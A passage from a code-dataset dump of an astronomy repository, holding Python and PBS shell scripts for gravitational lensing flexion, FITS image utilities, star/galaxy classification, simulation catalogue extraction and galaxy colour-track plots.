1/2\n else:\n logM1a = M10 + M1a * (a - 1)\n logMs0a = Ms00 + Ms0a * (a - 1)\n notlogMs0a = 10 ** logMs0a\n b = b0 + ba * (a-1)\n d = d0 + da * (a-1)\n g = g0 + ga * (a-1)\n mhalo = logM1a + b * (mstar[i] - logMs0a) + ((10 ** mstar[i]/notlogMs0a)**d)/(1+(10 ** mstar[i]/notlogMs0a)**(-g)) - 1/2\n if mstar_sluse[i] > 10.5:\n fDM = a_aug * (mstar_sluse[i] - 11) + b_aug\n #print fDM\n mtotal = (10**mstar_sluse[i]) / (1 - fDM)\n beta = dist.angular_diameter_distance(z_d,z) * D_S / (dist.angular_diameter_distance(0,z) * D_DS)\n if z > z_d:\n fbeta = (1 - beta)**2\n #print fbeta\n else:\n fbeta = 1\n if 10**(mstar[i]) < Mb:\n sigma_zahid[i] = sb * ((10**mstar[i] / Mb)**a1)\n else:\n sigma_zahid[i] = sb * ((10**mstar[i] / Mb)**a2)\n theta_halo = np.sqrt((10 ** mhalo) / (10 ** 11.09)) * np.sqrt(1000 * dist.angular_diameter_distance(z,z_s)/(dist.angular_diameter_distance(0,z) * D_S)) # https://en.wikipedia.org/wiki/Einstein_radius I already checked this formula manually\n theta_zahid = radinsec * 4 * 3.14 * (sigma_zahid[i]/300000)**2 * dist.angular_diameter_distance(z,z_s) / D_S\n #print theta_zahid\n flex_halo[i] = fbeta * (theta_lens * theta_halo)**2 / (sep[i]**3)\n flex_zahid[i] = fbeta * (theta_lens * theta_zahid)**2 / (sep[i]**3)\n if mstar_sluse[i] > 10.5:\n theta_sluse = np.sqrt(mtotal / (10 ** 11.09)) * np.sqrt(1000 * dist.angular_diameter_distance(z,z_s)/(dist.angular_diameter_distance(0,z) * D_S)) # https://en.wikipedia.org/wiki/Einstein_radius\n flex_sluse[i] = fbeta * (theta_lens * theta_sluse)**2 / (sep[i]**3)\n else:\n flex_sluse[i] = flex_zahid[i]\n if z >= z_s:\n flex_halo[i] = 0\n flex_sluse[i] = 0\n flex_zahid[i] = 0\nhead = \"sep flex_halo flex_sluse flex_zahid veldisp\"\nnp.savetxt(file[:-4] + \"_flexionshift.cat\",np.c_[sep,flex_halo,flex_sluse,flex_zahid,sigma_zahid],fmt='%.2f %.4e %.4e %.4e %.2f',header=head)\n\n\n" }, { "alpha_fraction": 0.698019802570343, "alphanum_fraction": 0.7227723002433777, "avg_line_length": 21.44444465637207, "blob_id": "4a0bfa5c4593aa5cbf3565978017cf9138fc8777", "content_id": "7b65e1a9c5376e594ef3cac3bb4213229e65b901", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 202, "license_type": "no_license", "max_line_length": 42, "num_lines": 9, "path": "/python/image_utilities/mask_flag.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Create a simple blank image\n\nimport numpy as np\nfrom astropy.io import fits\n\nimage = fits.open('ch1_4amin_nolens.fits')\ndata = image[0].data\ndata[data != 0] = 0\nimage.writeto('flg.fits',clobber=True)\n" }, { "alpha_fraction": 0.6585366129875183, "alphanum_fraction": 0.6951219439506531, "avg_line_length": 19.5, "blob_id": "42a1898482764b0145863934033c40051ab30fdc", "content_id": "2f132d8148ed6624dd551ad302c989e4b8c3df02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 82, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/python/scripts/NAOJ/test.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n#PBS -l select=1:ncpus=3:mem=1gb\n#PBS -N HelloJob\nprint \"Hello\"\n" }, { "alpha_fraction": 0.6797752976417542, "alphanum_fraction": 0.704119861125946, "avg_line_length": 27.105262756347656, "blob_id": "26b7ce7b614051ce70c8f7ec582c8284a337d942", "content_id": "a8bcaa050b204390234fef6245786e7db1bcbe22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 534, "license_type": "no_license", "max_line_length": 115, "num_lines": 19, "path": "/python/image_utilities/sexnoisemap.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple script that combines Sextractor OBJECTS and BACKGROUND_RMS images into a sigma map. NGAIN is NCOMBINExGAIN\n# run as python sexnoisemap.py obj.fits rms.fits out.fits NGAIN\n\nimport numpy as np\nimport sys\nfrom astropy.io import fits\n\nngain = float(str(sys.argv[4]))\nim = fits.open(str(sys.argv[1]))\nim[0].data = im[0].data / ngain\n\nimr = fits.open(str(sys.argv[2]))\nimr[0].data = imr[0].data ** 2\n\nout = np.sqrt(im[0].data + imr[0].data)\nout[out < 0] = np.median(out)\n\nim[0].data = out\nim.writeto(str(sys.argv[3]),clobber=True)\n" }, { "alpha_fraction": 0.6006515622138977, "alphanum_fraction": 0.6505486965179443, "avg_line_length": 57.90909194946289, "blob_id": "2777695f574512465d579b79e41d63334c4c074c", "content_id": "8a937814c7424ff5da5491366b513804e8b1d8d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5832, "license_type": "no_license", "max_line_length": 487, "num_lines": 99, "path": "/python/catalogue_utilities/classification.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# Classifies galaxies and stars following the CFHTLenS method and available spectroscopic info\n##########################\n\nimport numpy as np \n\n#file = \"i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephare.cat\"\n#file = \"i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephare.cat\"\n#file = \"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephare.cat\"\nfile = \"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephare.cat\"\nlimrad = 2.45\n\nid = 8\n#chi_gal_bpz = 58\n#chi_star_bpz = 59\n#chi_gal_eazy = 65\n#chi_star_eazy = 66\nchi_gal_bpz = 83 # for IRAC\nchi_star_bpz = 84 # for IRAC\nchi_gal_eazy = 90 # for IRAC\nchi_star_eazy = 91 # for IRAC\nradius = 6\nmag = 4\nspec = 40\nclassify1_bpz = 8 # first pass, CFHTLenS, fake index\nclassify2_bpz = 8 # second pass, including spectroscopic info, fake index\nclassify1_eazy = 8 # first pass, CFHTLenS, fake index\nclassify2_eazy = 8 # second pass, including spectroscopic info, fake index\n\ndata = np.loadtxt(file,usecols=(id,chi_gal_bpz,chi_star_bpz,chi_gal_eazy,chi_star_eazy,radius,mag,spec,classify1_bpz,classify2_bpz,classify1_eazy,classify2_eazy),unpack=True)\n\n# indexing\nid = 0\nchi_gal_bpz = 1\nchi_star_bpz = 2\nchi_gal_eazy = 3\nchi_star_eazy = 4\nradius = 5\nmag = 6\nspec = 7\nclassify1_bpz = 8\nclassify2_bpz = 9\nclassify1_eazy = 10\nclassify2_eazy = 11\n\n# CFHTLenS method: star=0 gal=1\nfor i in range(len(data[id])):\n if data[mag][i] < 21:\n if data[radius][i] <= limrad:\n data[classify1_bpz][i] = 0\n data[classify1_eazy][i] = 0\n else:\n data[classify1_bpz][i] = 1\n data[classify1_eazy][i] = 1\n if data[mag][i] >= 21 and data[mag][i] <= 23:\n if data[radius][i] <= limrad and data[chi_star_bpz][i] < 2.0 * data[chi_gal_bpz][i]:\n data[classify1_bpz][i] = 0\n else: data[classify1_bpz][i] = 1\n if data[radius][i] <= limrad and data[chi_star_eazy][i] < 2.0 * data[chi_gal_eazy][i]:\n data[classify1_eazy][i] = 0\n else: data[classify1_eazy][i] = 1\n if data[mag][i] > 23:\n data[classify1_bpz][i] = 1\n data[classify1_eazy][i] = 1\n\n# include the spectroscopic knowledge:\n# nospec star -3\n# nospec gal 2\n# spec star ok -1\n# spec star wrong -2\n# spec gal ok 0\n# spec gal wrong 1\ndata[classify2_bpz][(data[classify1_bpz] == 0) & (data[spec] == -1)] = -3\ndata[classify2_bpz][(data[classify1_bpz] == 1) & (data[spec] == -1)] = 2\ndata[classify2_bpz][(data[classify1_bpz] == 0) & (data[spec] == -2)] = -1\ndata[classify2_bpz][(data[classify1_bpz] == 1) & (data[spec] == -2)] = -2\ndata[classify2_bpz][(data[classify1_bpz] == 1) & (data[spec] >= 0)] = 0\ndata[classify2_bpz][(data[classify1_bpz] == 0) & (data[spec] >= 0)] = 1\n\ndata[classify2_eazy][(data[classify1_eazy] == 0) & (data[spec] == -1)] = -3\ndata[classify2_eazy][(data[classify1_eazy] == 1) & (data[spec] == -1)] = 2\ndata[classify2_eazy][(data[classify1_eazy] == 0) & (data[spec] == -2)] = -1\ndata[classify2_eazy][(data[classify1_eazy] == 1) & (data[spec] == -2)] = -2\ndata[classify2_eazy][(data[classify1_eazy] == 1) & (data[spec] >= 0)] = 0\ndata[classify2_eazy][(data[classify1_eazy] == 0) & (data[spec] >= 0)] = 1\n\nprint \"spectroscopic gal/stars:\",len(data[spec][data[spec] >= 0]),\"/\",len(data[spec][data[spec] == -2])\nprint \"CFHTLenS based gal/stars (BPZ):\",len(data[classify1_bpz][data[classify1_bpz]==1]),\"/\",len(data[classify1_bpz][data[classify1_bpz]==0]),\" (\",len(data[classify1_bpz][data[classify1_bpz]==1]) * 100.0 / (len(data[classify1_bpz][data[classify1_bpz]==1])+len(data[classify1_bpz][data[classify1_bpz]==0])),\"%,\",len(data[classify1_bpz][data[classify1_bpz]==0])*100.0/(len(data[classify1_bpz][data[classify1_bpz]==1])+len(data[classify1_bpz][data[classify1_bpz]==0])),\"%)\"\nprint \"incorrectly identified gals (BPZ):\",len(data[classify2_bpz][data[classify2_bpz] == 1]),\"/\",len(data[spec][data[spec]>= 0]),\",\", 100.0 * len(data[classify2_bpz][data[classify2_bpz] == 1]) / len(data[spec][data[spec]>= 0]), \"+/-\", np.sqrt(len(data[classify2_bpz][data[classify2_bpz] == 1])), \"%\"\nprint \"incorrectly identified stars (BPZ):\",len(data[classify2_bpz][data[classify2_bpz] == -2]),\"/\",len(data[spec][data[spec] == -2]),\",\", 100.0 * len(data[classify2_bpz][data[classify2_bpz] == -2]) / len(data[spec][data[spec] == -2]), \"+/-\", np.sqrt(len(data[classify2_bpz][data[classify2_bpz] == -2])), \"%\"\n\nprint \"CFHTLenS based gal/stars (eazy):\",len(data[classify1_eazy][data[classify1_eazy]==1]),\"/\",len(data[classify1_eazy][data[classify1_eazy]==0]),\" (\",len(data[classify1_eazy][data[classify1_eazy]==1]) * 100.0 / (len(data[classify1_eazy][data[classify1_eazy]==1])+len(data[classify1_eazy][data[classify1_eazy]==0])),\"%,\",len(data[classify1_eazy][data[classify1_eazy]==0])*100.0/(len(data[classify1_eazy][data[classify1_eazy]==1])+len(data[classify1_eazy][data[classify1_eazy]==0])),\"%)\"\nprint \"incorrectly identified gals (eazy):\",len(data[classify2_eazy][data[classify2_eazy] == 1]),\"/\",len(data[spec][data[spec]>= 0]),\",\", 100.0 * len(data[classify2_eazy][data[classify2_eazy] == 1]) / len(data[spec][data[spec]>= 0]), \"+/-\", np.sqrt(len(data[classify2_eazy][data[classify2_eazy] == 1])), \"%\"\nprint \"incorrectly identified stars (eazy):\",len(data[classify2_eazy][data[classify2_eazy] == -2]),\"/\",len(data[spec][data[spec] == -2]),\",\", 100.0 * len(data[classify2_eazy][data[classify2_eazy] == -2]) / len(data[spec][data[spec] == -2]), \"+/-\", np.sqrt(len(data[classify2_eazy][data[classify2_eazy] == -2])), \"%\"\n\nfileout = file[:-4] + \"_classification.cat\"\nstr = \"ID class_bpz class_eazy\"\ndataout = np.c_[data[id],data[classify2_bpz],data[classify2_eazy]]\nnp.savetxt(fileout,dataout,header=str,fmt='%d \\t %d \\t %d \\t')\n" }, { "alpha_fraction": 0.6681514382362366, "alphanum_fraction": 0.7661470174789429, "avg_line_length": 23.94444465637207, "blob_id": "cecb764cfbf9586231243e06f4bfc2e2590128ed", "content_id": "251866bf5fcd822d6c762d36862b61ff18bb1c56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 449, "license_type": "no_license", "max_line_length": 103, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer10.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log10.out\n#PBS -e Log10.err\n#PBS -N 10\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2228.py WFI2033 5 45 23 meds gal gamma oneoverr mass2overr\npython inferkappa_unbiasedwithshearincrement2228.py WFI2033 5 120 23 meds gal gamma oneoverr mass2overr\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": "3ccd49635a8fdbea06bde23bea073d151d58e06b", "content_id": "3917b41d7062d9fe15417506c0d3208897566933", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium6.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python extractMillennium_Henriques.py GGL_los_8_5_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_5_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_5_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_5_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_5_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_5_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_5_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_5_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { "alpha_fraction": 0.5796194076538086, "alphanum_fraction": 0.6865561604499817, "avg_line_length": 52.235294342041016, "blob_id": "bfe2e4aaab4cf8f7195a09f90a781349ea9881a7", "content_id": "114dc8c26403e3c82d76c4595f59650eace575a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24435, "license_type": "no_license", "max_line_length": 270, "num_lines": 459, "path": "/python/plot_utilities/plot_galcolortracks.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# plots observed galaxy colors versus theoretical tracks from BPZ\n# this file consists of multiple codes added one ofter another for each filter combination\n\nimport numpy as np\nimport pylab as plt\nu,u_err,g,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err,J,J_err,H,H_err,K,K_err=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/test/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpzspecz.cat\",usecols=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],unpack=True)\nu = u + 1.42\ng = g + 0.01\nr = r + 0.03\ni = i + 0.00\nz = z - 0.02\nY = Y - 0.09\nJ = J - 0.075\nH = H - 0.02\nK = K - 0.07\nerr_x = np.sqrt(J_err**2 + H_err**2)\nerr_y = np.sqrt(H_err**2 + K_err**2)\nplt.clf()\nplt.errorbar(J-H,H-K,xerr=err_x,yerr=err_y,color='black',linestyle=\"None\")\nsbc_J=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.J_HAWKI.AB\",usecols=[1],unpack=True)\nsbc_H=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.H_HAWKI.AB\",usecols=[1],unpack=True)\nsbc_Ks=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.Ks_HAWKI.AB\",usecols=[1],unpack=True)\nel_J=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.J_HAWKI.AB\",usecols=[1],unpack=True)\nel_H=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.H_HAWKI.AB\",usecols=[1],unpack=True)\nel_Ks=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.Ks_HAWKI.AB\",usecols=[1],unpack=True)\nscd_J=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.J_HAWKI.AB\",usecols=[1],unpack=True)\nscd_H=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.H_HAWKI.AB\",usecols=[1],unpack=True)\nscd_Ks=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.Ks_HAWKI.AB\",usecols=[1],unpack=True)\nsb3_J=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.J_HAWKI.AB\",usecols=[1],unpack=True)\nsb3_H=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.H_HAWKI.AB\",usecols=[1],unpack=True)\nsb3_Ks=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.Ks_HAWKI.AB\",usecols=[1],unpack=True)\nsb2_J=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.J_HAWKI.AB\",usecols=[1],unpack=True)\nsb2_H=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.H_HAWKI.AB\",usecols=[1],unpack=True)\nsb2_Ks=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.Ks_HAWKI.AB\",usecols=[1],unpack=True)\nim_J=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.J_HAWKI.AB\",usecols=[1],unpack=True)\nim_H=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.H_HAWKI.AB\",usecols=[1],unpack=True)\nim_Ks=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.Ks_HAWKI.AB\",usecols=[1],unpack=True)\nsbc_J=sbc_J[:100] # in order to constraint redshift between 0 and 1\nsbc_H=sbc_H[:100]\nsbc_Ks=sbc_Ks[:100]\nel_J=el_J[:100]\nel_H=el_H[:100]\nel_Ks=el_Ks[:100]\nscd_J=scd_J[:100]\nscd_H=scd_H[:100]\nscd_Ks=scd_Ks[:100]\nsb3_J=sb3_J[:100]\nsb3_H=sb3_H[:100]\nsb3_Ks=sb3_Ks[:100]\nsb2_J=sb2_J[:100]\nsb2_H=sb2_H[:100]\nsb2_Ks=sb2_Ks[:100]\nim_J=im_J[:100]\nim_H=im_H[:100]\nim_Ks=im_Ks[:100]\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! FOR JHK ONLY I NEED TO DO CONVERSION FROM AB (TEMPLATES) TO VEGA (OBSERVED)\n# MOIRCS J: AB-Vega= 0.91\n# MOIRCS H: AB-Vega= 1.35\n# MOIRCS Ks: AB-Vega= 1.83\nplt.plot(-2.5*np.log10(sbc_J/sbc_H)-0.91+1.35,-2.5*np.log10(sbc_H/sbc_Ks)-1.35+1.83,color='blue',label='Sbc')\nplt.plot(-2.5*np.log10(el_J/el_H)-0.91+1.35,-2.5*np.log10(el_H/el_Ks)-1.35+1.83,color='red',label='El')\nplt.plot(-2.5*np.log10(scd_J/scd_H)-0.91+1.35,-2.5*np.log10(scd_H/scd_Ks)-1.35+1.83,color='cyan',label='Scd')\nplt.plot(-2.5*np.log10(sb3_J/sb3_H)-0.91+1.35,-2.5*np.log10(sb3_H/sb3_Ks)-1.35+1.83,color='magenta',label='SB3')\nplt.plot(-2.5*np.log10(sb2_J/sb2_H)-0.91+1.35,-2.5*np.log10(sb2_H/sb2_Ks)-1.35+1.83,color='brown',label='SB2')\nplt.plot(-2.5*np.log10(im_J/im_H)-0.91+1.35,-2.5*np.log10(im_H/im_Ks)-1.35+1.83,color='gray',label='Im')\nplt.xlabel(\"J-H\")\nplt.ylabel(\"H-Ks\")\nplt.xlim((-1,2))\nplt.ylim((-1,2))\nplt.legend()\nplt.show()\n\n##################################\n\nimport pylab as plt\nu,u_err,g,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err,J,J_err,H,H_err,K,K_err=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/test/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpzspecz.cat\",usecols=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],unpack=True)\nu = u + 1.42\ng = g + 0.01\nr = r + 0.03\ni = i + 0.00\nz = z - 0.02\nY = Y - 0.09\nJ = J - 0.075\nH = H - 0.02\nK = K - 0.07\nerr_x = np.sqrt(u_err**2 + g_err**2)\nerr_y = np.sqrt(g_err**2 + r_err**2)\nplt.clf()\nplt.errorbar(u-g,g-r,xerr=err_x,yerr=err_y,color='black',linestyle=\"None\")\nsbc_u=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.u_DEC.AB\",usecols=[1],unpack=True)\nsbc_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsbc_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nel_u=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.u_DEC.AB\",usecols=[1],unpack=True)\nel_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nel_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nscd_u=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.u_DEC.AB\",usecols=[1],unpack=True)\nscd_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nscd_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb3_u=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.u_DEC.AB\",usecols=[1],unpack=True)\nsb3_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsb3_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb2_u=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.u_DEC.AB\",usecols=[1],unpack=True)\nsb2_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsb2_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nim_u=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.u_DEC.AB\",usecols=[1],unpack=True)\nim_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nim_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsbc_u=sbc_u[:100] # in order to constraint redshift between 0 and 1\nsbc_g=sbc_g[:100]\nsbc_r=sbc_r[:100]\nel_u=el_u[:100]\nel_g=el_g[:100]\nel_r=el_r[:100]\nscd_u=scd_u[:100]\nscd_g=scd_g[:100]\nscd_r=scd_r[:100]\nsb3_u=sb3_u[:100]\nsb3_g=sb3_g[:100]\nsb3_r=sb3_r[:100]\nsb2_u=sb2_u[:100]\nsb2_g=sb2_g[:100]\nsb2_r=sb2_r[:100]\nim_u=im_u[:100]\nim_g=im_g[:100]\nim_r=im_r[:100]\nplt.plot(-2.5*np.log10(sbc_u/sbc_g),-2.5*np.log10(sbc_g/sbc_r),color='blue',label='Sbc')\nplt.plot(-2.5*np.log10(el_u/el_g),-2.5*np.log10(el_g/el_r),color='red',label='El')\nplt.plot(-2.5*np.log10(scd_u/scd_g),-2.5*np.log10(scd_g/scd_r),color='cyan',label='Scd')\nplt.plot(-2.5*np.log10(sb3_u/sb3_g),-2.5*np.log10(sb3_g/sb3_r),color='magenta',label='SB3')\nplt.plot(-2.5*np.log10(sb2_u/sb2_g),-2.5*np.log10(sb2_g/sb2_r),color='brown',label='SB2')\nplt.plot(-2.5*np.log10(im_u/im_g),-2.5*np.log10(im_g/im_r),color='gray',label='Im')\nplt.xlabel(\"u-g\")\nplt.ylabel(\"g-r\")\nplt.xlim((-0.5,2))\nplt.ylim((-0.5,2.5))\nplt.legend()\nplt.show()\n\n##################################\n\nimport pylab as plt\nu,u_err,g,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err,J,J_err,H,H_err,K,K_err=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/test/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpzspecz.cat\",usecols=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],unpack=True)\nu = u + 1.42\ng = g + 0.01\nr = r + 0.03\ni = i + 0.00\nz = z - 0.02\nY = Y - 0.09\nJ = J - 0.075\nH = H - 0.02\nK = K - 0.07\nerr_x = np.sqrt(g_err**2 + r_err**2)\nerr_y = np.sqrt(r_err**2 + i_err**2)\nplt.clf()\nplt.errorbar(g-r,r-i,xerr=err_x,yerr=err_y,color='black',linestyle=\"None\")\nsbc_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsbc_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsbc_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nel_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nel_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nel_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nscd_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nscd_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nscd_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb3_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsb3_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb3_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb2_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsb2_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb2_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nim_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nim_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nim_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsbc_g=sbc_g[:100] # in order to constraint redshift between 0 and 